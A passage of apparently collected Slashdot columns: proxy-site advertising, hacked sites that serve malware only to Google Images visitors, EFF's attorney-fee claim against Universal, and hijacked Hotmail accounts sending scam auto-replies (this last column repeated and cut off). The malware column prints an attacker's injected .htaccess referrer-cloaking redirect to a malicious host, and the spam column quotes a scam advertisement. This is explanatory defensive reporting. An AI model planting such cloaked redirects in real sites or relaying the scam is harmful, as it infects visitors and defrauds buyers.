    then that's their prerogative. The quiz-advertisement model only says that advertisers can require users to answer a question before closing the ad; it would be up to the advertiser to decide what question works best. I suspect that the actual-information model would work better for quiz ads, but advertisers could try both and see what works.

    There are already some websites that require you to "complete an offer" (i.e. become a customer of some third-party company, at least for a free trial period) in order to use their services, but most proxy sites have so far declined to carry advertisements like these. Evidently their users consider this too high of a price to pay to access a proxy site. Filling out an offer is not just time-consuming, but leaves the door open to future problems -- will they sell your name or your e-mail address? Will they make it hard to cancel your "free trial", and then start billing you? The problem seems to be that there is too large of a gap between the "fees" associated with the two options -- a normal advertisement doesn't bring enough money to the proxy operator, but a complete-an-offer advertisement is such a steep price that most users won't pay it. The "quiz ad" is like a "fee" that falls nicely in the middle -- a smaller time commitment, and your worries are over after you fill in the quiz and hit submit.

    If the very thought of such an ad still seems too annoying for words, then I think that objection misses the point. If the revenue from "normal" ads (pop-ups, drop-downs, AdSense widgets) is enough to pay for the operation of a "high-end" proxy service (catering to the people who need several new proxies every day), then such proxy services with "normal" ads will continue to exist. Indeed, anyone who tried running the more annoying "quiz ads" would not be able to get off the ground, because users would flock to the competing proxy sites using normal ads instead. If "high-end" proxy services flourished that were using quiz ads, it would only be because you simply can't provide a high-end service for less money than the quiz ads are bringing in.

    It's possible that some advertisers would be reluctant to display ads in a manner that users would continue an annoying obstacle, but I'm not sure that's really a problem. The most intrusive advertisements currently in use on mainstream websites are probably the "premercials" that display before some news videos on CNN.com and other news sites. Unlike drop-down ads which can be closed with the click of a button, the video pre-mercials can't be skipped. Since you're actually expecting the news video to come up immediately when you click the link to start playing the video, you would think that many users would grit their teeth in annoyance upon seeing the "pre-mercial", and transfer that irritation to the advertiser's brand name, but there are so many big-name companies buying those pre-mercials that they must believe it's having a positive effect. So intrusiveness itself doesn't seem to tarnish a brand.

    But I don't propose to micro-manage suggestions for how the more intrusive ads would look, or how advertisers should tailor their ads to fit the format. I'm just saying that a new breed of more intrusive ads, even more annoying than pop-ups, might be just what we need to stay ahead of increasingly sophisticated Internet censors. It's still technically quite trivial to release a steady stream of new proxy sites that defeat most Internet filters, but it costs money to buy domains and maintain the service, and the money has to come from somewhere.

  14. Image Searchers Snared By Malware

    Search · Security · · posted by samzenpus · from the caught-in-the-net dept. · 144 comments
    Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

    A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

    It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

    GET /tradingblox/courses.htm HTTP/1.1
    Host: www.tradingblox.com

    then the normal page would be returned. But if you entered these commands:

    GET /tradingblox/courses.htm HTTP/1.1
    Host: www.tradingblox.com
    Referer: http://images.google.com/

    then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

    (For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

    GET /support/ HTTP/1.1
    Host: www.google.com
    Referer: http://www.cnn.com/article.url.goes.here/

    So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

    Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

    Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

    Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

    This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

    Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

    It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

    But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

    And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

  15. Universal, Pay Those EFFing Lawyers

    Features · · posted by CmdrTaco · from the they-can-afford-it dept. · 335 comments
    Slashdot frequent contributor Bennett Haselton writes "The EFF is seeking over $400,000 in attorney's fees from Universal Music Group after Universal sent a DMCA takedown notice to YouTube, demanding the removal of a video posted by user Stephanie Lenz. Lenz had posted a video of her toddler dancing to a 30-second clip of the Prince song "Let's Go Crazy"; after Universal sent the takedown notice, the EFF sent YouTube a counter-notice on behalf of Lenz arguing that the video was fair use, and YouTube restored it. Now the EFF is asking the judge to award them attorney's fees for their work." Use your magical clicking device below to read many more words.

    Section 512(f) of the DMCA says pretty clearly that anyone who "knowingly materially misrepresents under this section... that material or activity is infringing... shall be liable for any damages, including costs and attorneys' fees", which would seem to apply here; the EFF argues that Universal should have reasonably known that the video obviously constituted fair use. In a Law.com article about the case, attorney Kelly Klaus, representing Universal, countered that "Congress also said that there was another remedy, which is the counter-notice procedure, which is what happened here." But this seems to miss the point -- the DMCA says that the remedies are the counter-notice procedure and an award for attorney's fees. (Klaus's firm did not respond to requests for comment for this article.) Anyway, as EFF staff attorney Corynne McSherry points out, if there were no possible award for attorney's fees against copyright holders who make false accusations, then there would be no disincentive for copyright holders not to file frivolous accusations in the first place.

    I'm an EFF member and support their request for attorney's fees, but let's play devil's advocate. Suppose you were an indie musician who sold your songs online, and you found a number of YouTube videos that used your song without permission, so you sent a long list of DMCA takedown notices to YouTube. Included in that list was one video that used only a brief portion of your song, short enough to count as fair use. Is $400,000 a fair punishment for accidentally including one video in your list that wasn't a bona fide copyright infringement?

    On the other hand, if the EFF doesn't get their attorneys fees, then they have to eat the cost of the work they did, and that doesn't seem fair either.

    The problem is that once you have a $400,000 bill on the table, someone has to pay it, which punishes one or both parties usually vastly out of proportion to any wrongdoing. ($400,000 is almost half of what Reebok had to pay when one of their lead-tainted bracelets killed a child.) Huge attorney's fees awards also limit access to the court system for plaintiffs who might have a reasonable case, but can't afford the risk of having to pay attorney's fees if they lose, and for defendants who might also have a reasonable case, but are under pressure to settle quickly to avoid the risk of a huge attorney's fees award against them.

    This suggests an economics / game theory problem: Could you come up with a system that takes into account the incentives of parties on both sides, and that prevents huge legal bills from being generated?

    Now, any argument about the legal system usually raises two kinds of objections. The first is that the existing system "works". Well, in many ways it does, but everybody also knows that wealthy corporations and individuals enjoy a huge advantage in the court system, even though courts are supposed to treat all parties equally. So at least in that respect it doesn't "work" the way it's supposed to. The second objection is that it's too hard to change the rules and traditions that are built into legal proceedings, so it's better just to work within the system. True, but that's not the question I'm asking. I'm posing it as a logical brainteaser: If you had carte blance to modify the way that legal disputes were held, could you do it in a way that respects the rights and interests of all parties and still minimizes the legal fees incurred? (Whether I'm right or wrong, my goal is to make this argument more interesting to mathematicians and game theorists, than to lawyers; otherwise, I've failed.)

    From a game-theoretic point of view, you might argue that large attorney's fees serve a useful purpose by discouraging frivolous lawsuits. The problem is that the fees don't just discourage frivolous lawsuits but also non-frivolous lawsuits where there's a reasonable chance of losing. On the other hand, a person who is already broke would have little disincentive to file a frivolous lawsuit, since the worst that can happen is that they'd get hit with a huge award for attorney's fees and have to declare bankruptcy, which they might consider worth the risk for a small shot at a million-dollar payout. So assume that attorney's fees are not themselves the best way to deter frivolous lawsuits, and that avoiding large fees in general is still a desirable thing. How do you design rules to achieve that?

    I think you could save a lot of money by enforcing a rule that a lawyer is not allowed to seek attorney's fees from the other side for arguing any points that the other side offered to concede anyway. So the incentive would be that if party A's lawyer concedes some point of fact or point of law, and party B ultimately wins the case and an award for attorney's fees, then party B is not allowed to seek attorney's fees for arguing the point conceded by party A's lawyer.

    In all of my legal cases where the other side was represented by a lawyer who was getting paid by their client up front, it was clear from reading the other side's briefs (and my own lawyers agreed with me) that opposing counsel had spent a lot of time spinning their wheels and arguing obvious or irrelevant points before getting to the crux of the dispute. If their client wants to pay them for that busy-work, that's between them and their client, but if they had won the case and an award for attorney's fees, I would have objected that they shouldn't be allowed to charge us for time they spent arguing points that we would have given to them anyway. The hypothetical savings from implementing and enforcing this rule, are not trivial.

    So how does game theory predict that the two sides would behave under this rule? Suppose MegaCorp is suing or being sued by IndieActivist. MegaCorp's first priority is to win, and if possible to hit IndieActivist with a huge award for attorney's fees to discourage other would-be IndieActivists. MegaCorp doesn't want to lose, but if they do lose, they don't much care about the attorney's fees award they would have to pay to IndieActivist's lawyers. In this scenario, they would be expected to concede very little, disputing trivial points in order to drag out the case as long as possible, hoping that IndieActivist's lawyers would run out of time or money and pressure their client to settle. In other words, MegaCorp would behave about the same as they would under the existing rules.

    For IndieActivist, on the other hand, their first priority is to win, but they also care very much about not having to pay a staggering award for attorney's fees if they lose. So they would be expected to concede any points of fact or law, even if favorable to MegaCorp, if those points are so obvious that they don't think the judge would be likely to rule in their favor on those questions anyway. This way, even if IndieActivist loses and has to pay attorney's fees to MegaCorp, those fees would be limited to the time spent arguing the actual point of disagreement that formed the crux of the lawsuit.

    Suppose, for example, that Universal had actually sued Lenz for violating Prince's copyright by using a 30-second excerpt of his song in her video. Lenz or her lawyers could have filed a brief conceding all the obvious points that they would expect Universal's lawyers to make: Prince was the holder of the copyright, the copyright had been filed with the Copyright Office, Lenz never sought permission for using the recording, etc. Very quickly, the whole case could be distilled down to: "Show this video to the judge and let them decide if it qualifies as 'fair use'." Any effort spent arguing any points beside that, is wasteful. And if the legal system encourages lawyers to rack up billable hours arguing other points, then the system is wasteful. Concede the obvious, and everybody's costs are kept under control.

    This only partially addresses the problem of large attorney's fees, because it still leaves the fees that are generated in the process of arguing points that the other side wouldn't concede. Solving this problem is much harder, because while you can simply eliminate the work that's spent on arguing points that the other side would give to you anyway, you can't eliminate the work spent on points that are genuinely in dispute, you can only try to make that work shorter and cheaper. I've argued for my own fairly complicated remedy in a separate article, but my main point was that legal costs aren't driven up so much by the complexity of the law as by the ambiguity in it. The Windows programming interface, after all, is also very complex, but if you can write a clear description of what you want a simple program to do, you can often get a programmer to write the program for you for dirt cheap. In arguing a legal case, on the other hand, the number of possible outcomes grows exponentially with each point of ambiguity in the law where there's no way to predict how the judge will interpret a particular rule.

    But still, even if you can't reduce the ambiguity in how a legal question will be interpreted, you can avoid a lot of unnecessary attorney's fees by distilling the case just down to that particular question. Is it fair use to use a 30-second clip of Prince's song in a video of a dancing toddler? Let the judge decide. But if that's the one and only point that both sides can't agree on, then neither side should be able to bill for time spent arguing about anything else.

    Perhaps someone mathematically or logically inclined can come up with a better algorithm for avoiding the billing hours generated by arguing the obvious. I'm not entirely happy with my own solution, because it still allows MegaCorp to concede absolutely nothing, and to try and bleed IndieActivist dry by forcing them to argue even the most trivial points. IndieActivist's lawyer could be reimbursed for that time if they win and get an award for attorney's fees, but they might run out of money or patience before then. To counter this tactic, you could allow either side to seek penalties for Frivolously Arguing The Super-Obvious. If IndieActivist's lawyer wants MegaCorp to concede an obvious point and MegaCorp won't do it, IndieActivist could seek a FATSO penalty, and the judge could decide whether to award them that penalty if the point is really and truly obvious, without deciding on the merits of the case as a whole. The penalty doesn't have to be large enough to hurt MegaCorp, it just has to be large enough to compensate IndieActivist's lawyer for their time, so that MegaCorp can't run them into the ground by forcing them to argue every point unnecessarily. However, economic game theorists might think of some unintended consequence of the FATSO rule. Could MegaCorp flood IndieActivist's lawyer with a gigantic list of requested concessions, so that if IndieActivist's lawyer screws up and forgets to concede one of the points that the judge turns out to consider "obvious", MegaCorp could hammer them with a FATSO award too? It's hard to anticipate all the ways that either party might abuse a new rule of the game.

    Meanwhile, under the existing system, while it may be unfair to Universal in some cosmic sense that they have to pay out $400,000 for sending one mistaken DMCA takedown notice, it would be more unfair to force the EFF to eat those costs, and in any case the DMCA does clearly allow for an award of attorney's fees. But it would be better for everyone in the long run -- especially for the EFF and the kind of relatively powerless clients that they usually represent -- if there were more ways to keep legal costs from spiraling out of control in the first place.

  16. Hotmailers Hawking Hoax Hunan Half-Offs

    Tech · Spam · · posted by kdawson · from the how-horrific dept. · 135 comments
    Frequent Slashdot contributor Bennett Haselton writes "An estimated 200,000 Hotmail users currently have their auto-reply set to a message spamming an advertisement for Chinese scam websites, which sell "discounted" electronics. Presumably the spammers compromised a large number of Hotmail accounts to pull this off, but wouldn't it be pretty easy for Hotmail to query for which users have that set as their auto-reply, and turn the auto-reply off for them?" Read below for Bennett's thoughts.

    After a recent mailing that I sent out to a subset of my proxy mailing list, I got back 18 auto-replies from Hotmail users, all substantially similar to this:

    Dear friend:
    We are an electronic products wholesale .Our products are of high quality and low price. If you want to do business , we can offer you the most reasonable discount to make you get more profits. We are expecting for your business.

    Please visit our website: www.wedosale.com

    Email: wedosale@vip.188.com .
    MSN: wedosale@hotmail.com .

    Looking forward to your contact and long cooperation with us!

    Our mainly products such the phones, PSP, display TV, notebook, video, computers, Mp4, GPS, xbox 360, digital cameras and so on.

    Welcome to visit our website!

    Some of the spam auto-replies advertised different websites, and the wording varied between the different auto-responses, but they were all similar advertisements for Chinese electronics "retailers." (And so, I assume, the websites are all fronts for the same company -- if multiple spammers had independently hacked Hotmail users' accounts to set their auto-replies, it would be vanishingly unlikely that those spammers would all happen to be electronics hawkers.) This was from a mailing that I sent to a set of subscribers that included about 26,000 users with "hotmail.com" e-mail addresses. If 18 out of 26,000 users in my sample have had their accounts hacked to send spam auto-replies, then this must be happening to a large number of Hotmail users -- not a large proportion (only one in 1,500, in my sample), but with about 300 million Hotmail users, that would still be a large absolute number.

    The same spammers have apparently been spamming through Hotmail auto-replies for at least 11 months, according to this post in the Windows Live Help community forum from January 2009. At first, some pundits seemed to have assumed that spammers had created these accounts themselves and subscribed the accounts to people's lists, in order to spam the list owners (and, if it's a list that accepts subscriber posts, broadcast the spam to the other list readers). However, looking at the addresses in my proxy mailing list that were sending the spam auto-replies, I noticed that (1) our records show that the auto-reply-spamming subscribers joined the mailing list by various means, signing up through different Circumventor websites, not indicative of how a spammer would have joined the list by automated means, and (2) many of their email addresses are associated with legitimate-looking Myspace and Facebook accounts. Thus it looks as if these were real users who joined the list legitimately, and then got their accounts hacked by the spammers, who set those users' accounts to send the spam as an auto-response.

    (If you happened to look at the spammers' www.wedosale.com website, at this point you might be thinking: I don't want to give money to spammers, but can I really get a Blackberry for only $295? Couldn't I just order from the website, and then if the goods don't show up or they're not as advertised, I can dispute the charge on my credit card? Well, I signed up for a dummy account on the www.wedosale.com page and got as far as the order page, and the only payment types that they accept are wire transfer, Western Union, and Moneygram -- precisely those types where you cannot get the money back or dispute fraudulent charges. If you've already gone and ordered a Blackberry, don't hold your breath.)

    If my 26,000 users were a representative sample of the 300 million current Hotmail users, then with 1 out of 1,500 users in my sample being "infected," I could estimate that about 200,000 Hotmail users (1/1500 times 300 million) are currently set to send spam auto-replies. Hotmail claims to process 3 billion non-spam e-mails per day, for an average of about 10 non-spam e-mails per Hotmail user. That's the average for all users; what's the average for the infected users? Some factors would tend to lead to a lower average for infected users -- if they have lots of friends sending them mail, it's more likely that one of their friends would have told them about the auto-reply spam and told them to turn it off, so perhaps the users still sending the spams are the ones who don't receive a lot of messages from their friends. On the other hand, some of the infected accounts may be receiving more (non-spam) e-mail than average; one reason people sometimes abandon webmail accounts is that they're getting too much mail, even from newsletters like the Circumventor list that they had legitimately subscribed to. So, figuring that factors in both directions roughly cancel out, if each infected user is receiving the average number of 10 emails per day and sending 10 auto-reply spams in response, that's still a total of 2 million outgoing spams per day shilling for nonexistent Chinese iPhones.

    These are just back-of-the-envelope calculations, but even I'm overestimating by a whole order of magnitude, that's still 0.2 million auto-reply spams per day, or about 70 million spams that will be sent by this one company through Hotmail's servers in the coming year, if Hotmail doesn't stop it. (And closer to a billion spams in the coming year if I'm not overestimating.)

    And it's actually worse than that, because these spams are less likely than average to be filtered, since they're coming from Hotmail's servers. Normally you'd think that the content-based module of a spam filter would have no problem catching a message like the one at the top of this article, especially if millions of similar messages have been spewed out over the past year. However, messages from Hotmail's servers, regardless of content, are less likely to be blocked, since their network has a good reputation for sending little spam overall (due to measures such as requiring users to fill out a CAPTCHA when signing up, blocking each account from sending more than 500 messages per day, etc.). When I sent messages to the infected Hotmail users from my Gmail account, to see if the auto-responses would get through Gmail's spam filter, Gmail's blocked only half of the replies. When I mailed all the users again from my Hotmail account, the results were strange -- most of the users' accounts sent back no auto-reply at all, not even a reply that got routed to my junk folder. (Why would Hotmail accounts not send an auto-reply in response to a message from a Hotmail user? Please post if you have any idea what's going on there.) However, of the infected Hotmail accounts that did send a spam auto-reply, 100% of those auto-reply spams were delivered to my inbox. (Apparently, Hotmail's spam filter usually assumes that messages from other Hotmail users can't possibly be spam.) Only Yahoo Mail's spam filter, when I sent a test message to the infected users from my Yahoo Mail account, blocked all of the auto-replies as junk mail.

    For the infected users on my mailing list, I sent them a link to a set of instructions I'd written about how to set and un-set their Hotmail auto-reply and how to change their Hotmail password, with the hopes that they'd eventually see the message and follow the steps. 18 users rescued, 200,000 to go.

    So this is basically what's happening, but it still leaves some unanswered questions, such as: Why Hotmail accounts, but not Yahoo Mail, GMail, or AOL accounts? I've never noticed any auto-reply spam sent from any accounts at any of those other services. Whatever the spammers did to gain control of so many Hotmail accounts, if it was profitable for them, why didn't they do the same thing for Yahoo Mail? And, why did only one spammer do this? If they're sending between 1 and 10 million spams per day for free, they're probably making money at it. Whatever they did to hack those accounts, why wouldn't other spammers figure out the same method and copy them?

    Presumably the Chinese spammers stole large numbers of passwords from Hotmail users either via a huge phishing attack, or through a security hole in Hotmail or some other part of the Windows Live service. If it was done via a security hole in Hotmail that the spammers discovered, then that would explain why the spammer's methods only worked for Hotmail accounts, and also why no other spammers have copied their techniques. (A phishing attack, on the other hand, would be easy to modify for other webmail services, and would also be easy for other spammers to emulate, so that's not consistent with the observed evidence so far.) I also found this post from blogger Stuart Shelton describing how his account was hacked by Chinese spammers -- and from the blog post, it's clear that he's very tech-savvy and would have been unlikely to fall for a run-of-the-mill password phish. If the attack happened even to people who know what they're doing, that seems to make the security hole explanation more likely.

    Perhaps others can come up with some theories about what happened. It's easy to come up with guesses, but the hard part is to reconcile them with the fact that it has only affected Hotmail users so far, and no other spammer seems to have figured out how to copy the same technique yet.

    But there's a much simpler question too: Why doesn't Microsoft just turn off the auto-replies for these users' accounts? They can query to see exactly which users have these messages in their auto-replies, and then un-set the auto-reply automatically. Yes, I know that even for a simple database operation like that, there's always more to it when you're managing hundreds of millions of accounts across multiple servers -- but if it will stop this one sender from sending between 50 million and 500 million spams (that in many cases will bypass people's spam filters) from Hotmail's servers in the coming year, isn't it probably worth it?

    And even if it wasn't a phishing attack this time, sooner or later some other spammer will probably capture tens or hundreds of thousands of Hotmail accounts using a phish or some other method, and try spamming through auto-replies as well. So if Hotmail "fixes" this batch of auto-reply spam for practice, then the next time it happens, they'll know exactly what to do to take care of it.

    I've written some columns where I strongly believed every word but expected a lot of opposition, some where I wasn't sure if I was right and just wanted to see what people thought, and . But I rarely argue something that I think is a no-brainer. Hotmail should un-set the auto-replies for those users whose accounts are spamming for nonexistent Chinese electronics knockoffs, before those accounts send another several hundred million spams in the coming year. Am I smoking crack?

    Then again, maybe expectations for Hotmail shouldn't be set too high. I use SpeakEasy for my mail provider, and on about November 19th I found that all messages sent to hotmail.com addresses from SpeakEasy's servers were being bounced with an error message rejecting them for "spam-like characteristics."I called SpeakEasy and they confirmed that they knew Hotmail was blocking all mail from their users (although for "security reasons," SpeakEasy couldn't tell me what they were trying to do about it). The block wasn't lifted until about November 28th, when my messages started getting through again.

    If SpeakEasy, which has been in business for 15 years, has annual revenues of $60 million, and was bought in 2007 by Best Buy, can't even get through to Microsoft in less than 10 days to tell them to stop blocking all mail from their servers, then Microsoft should first fix their postmaster trouble ticket system, so that people are not blocked from writing to their friends and family members at Hotmail for a week and a half. Then get to work on the spam auto-responders.

  17. Hotmailers Hawking Hoax Hunan Half-Offs

    Tech · Spam · · posted by kdawson · from the how-horrific dept. · 135 comments
    Frequent Slashdot contributor Bennett Haselton writes "An estimated 200,000 Hotmail users currently have their auto-reply set to a message spamming an advertisement for Chinese scam websites, which sell "discounted" electronics. Presumably the spammers compromised a large number of Hotmail accounts to pull this off, but wouldn't it be pretty easy for Hotmail to query for which users have that set as their auto-reply, and turn the auto-reply off for them?" Read below for Bennett's thoughts.

    After a recent mailing that I sent out to a subset of my proxy mailing list, I got back 18 auto-replies from Hotmail users, all substantially similar to this:

    Dear friend:
    We are an electronic products wholesale .Our products are of high quality and low price. If you want to do business , we can offer you the most reasonable discount to make you get more profits. We are expecting for your business.

    Please visit our website: www.wedosale.com

    Email: wedosale@vip.188.com .
    MSN: wedosale@hotmail.com .

    Looking forward to your contact and long cooperation with us!

    Our mainly products such the phones, PSP, display TV, notebook, video, computers, Mp4, GPS, xbox 360, digital cameras and so on.

    Welcome to visit our website!

    Some of the spam auto-replies advertised different websites, and the wording varied between the different auto-responses, but they were all similar advertisements for Chinese electronics "retailers." (And so, I assume, the websites are all fronts for the same company -- if multiple spammers had independently hacked Hotmail users' accounts to set their auto-replies, it would be vanishingly unlikely that those spammers would all happen to be electronics hawkers.) This was from a mailing that I sent to a set of subscribers that included about 26,000 users with "hotmail.com" e-mail addresses. If 18 out of 26,000 users in my sample have had their accounts hacked to send spam auto-replies, then this must be happening to a large number of Hotmail users -- not a large proportion (only one in 1,500, in my sample), but with about 300 million Hotmail users, that would still be a large absolute number.

    The same spammers have apparently been spamming through Hotmail auto-replies for at least 11 months, according to this post in the Windows Live Help community forum from January 2009. At first, some pundits seemed to have assumed that spammers had created these accounts themselves and subscribed the accounts to people's lists, in order to spam the list owners (and, if it's a list that accepts subscriber posts, broadcast the spam to the other list readers). However, looking at the addresses in my proxy mailing list that were sending the spam auto-replies, I noticed that (1) our records show that the auto-reply-spamming subscribers joined the mailing list by various means, signing up through different Circumventor websites, not indicative of how a spammer would have joined the list by automated means, and (2) many of their email addresses are associated with legitimate-looking Myspace and Facebook accounts. Thus it looks as if these were real users who joined the list legitimately, and then got their accounts hacked by the spammers, who set those users' accounts to send the spam as an auto-response.

    (If you happened to look at the spammers' www.wedosale.com website, at this point you might be thinking: I don't want to give money to spammers, but can I really get a Blackberry for only $295? Couldn't I just order from the website, and then if the goods don't show up or they're not as advertised, I can dispute the charge on my credit card? Well, I signed up for a dummy account on the www.wedosale.com page and got as far as the order page, and the only payment types that they accept are wire transfer, Western Union, and Moneygram -- precisely those types where you cannot get the money back or dispute fraudulent charges. If you've already gone and ordered a Blackberry, don't hold your breath.)

    If my 26,000 users were a representative sample of the 300 million current Hotmail users, then with 1 out of 1,500 users in my sample being "infected," I could estimate that about 200,000 Hotmail users (1/1500 times 300 million) are currently set to send spam auto-replies. Hotmail claims to process 3 billion non-spam e-mails per day, for an average of about 10 non-spam e-mails per Hotmail user. That's the average for all users; what's the average for the infected users? Some factors would tend to lead to a lower average for infected users -- if they have lots of friends sending them mail, it's more likely that one of their friends would have told them about the auto-reply spam and told them to turn it off, so perhaps the users still sending the spams are the ones who don't receive a lot of messages from their friends. On the other hand, some of the infected accounts may be receiving more (non-spam) e-mail than average; one reason people sometimes abandon webmail accounts is that they're getting too much mail, even from newsletters like the Circumventor list that they had legitimately subscribed to. So, figuring that factors in both directions roughly cancel out, if each infected user is receiving the average number of 10 emails per day and sending 10 auto-reply spams in response, that's still a total of 2 million outgoing spams per day shilling for nonexistent Chinese iPhones.

    These are just back-of-the-envelope calculations, but even I'm overestimating by a whole order of magnitude, that's still 0.2 million auto-reply spams per day, or about 70 million spams that will be sent by this one company through Hotmail's servers in the coming year, if Hotmail doesn't stop it. (And closer to a billion spams in the coming year if I'm not overestimating.)

    And it's actually worse than that, because these spams are less likely than average to be filtered, since they're coming from Hotmail's servers. Normally you'd think that the content-based module of a spam filter would have no problem catching a message like the one at the top of this article, especially if millions of similar messages have been spewed out over the past year. However, messages from Hotmail's servers, regardless of content, are less likely to be blocked, since their network has a good reputation for sending little spam overall (due to measures such as requiring users to fill out a CAPTCHA when signing up, blocking each account from sending more than 500 messages per day, etc.). When I sent messages to the infected Hotmail users from my Gmail account, to see if the auto-responses would get through Gmail's spam filter, Gmail's blocked only half of the replies. When I mailed all the users again from my Hotmail account, the results were strange -- most of the users' accounts sent back no auto-reply at all, not even a reply that got routed to my junk folder. (Why would Hotmail accounts not send an auto-reply in response to a message from a Hotmail user? Please post if you have any idea what's going on there.) However, of the infected Hotmail accounts that did send a spam auto-reply, 100% of those auto-reply spams were delivered to my inbox. (Apparently, Hotmail's spam filter usually assumes that messages from other Hotmail users can't possibly be spam.) Only Yahoo Mail's spam filter, when I sent a test message to the infected users from my Yahoo Mail account, blocked all of the auto-replies as junk mail.

    For the infected users on my mailing list, I sent them a link to a set of instructions I'd written about how to set and un-set their Hotmail auto-reply and how to change their Hotmail password, with the hopes that they'd eventually see the message and follow the steps. 18 users rescued, 200,000 to go.

